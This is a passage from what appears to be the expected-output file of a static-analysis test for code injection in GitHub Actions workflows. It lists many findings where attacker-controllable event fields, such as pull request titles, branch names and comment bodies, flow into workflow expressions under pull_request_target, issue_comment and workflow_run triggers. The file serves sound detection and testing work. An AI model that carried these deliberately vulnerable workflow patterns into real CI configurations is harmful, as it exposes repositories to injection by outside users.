pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | 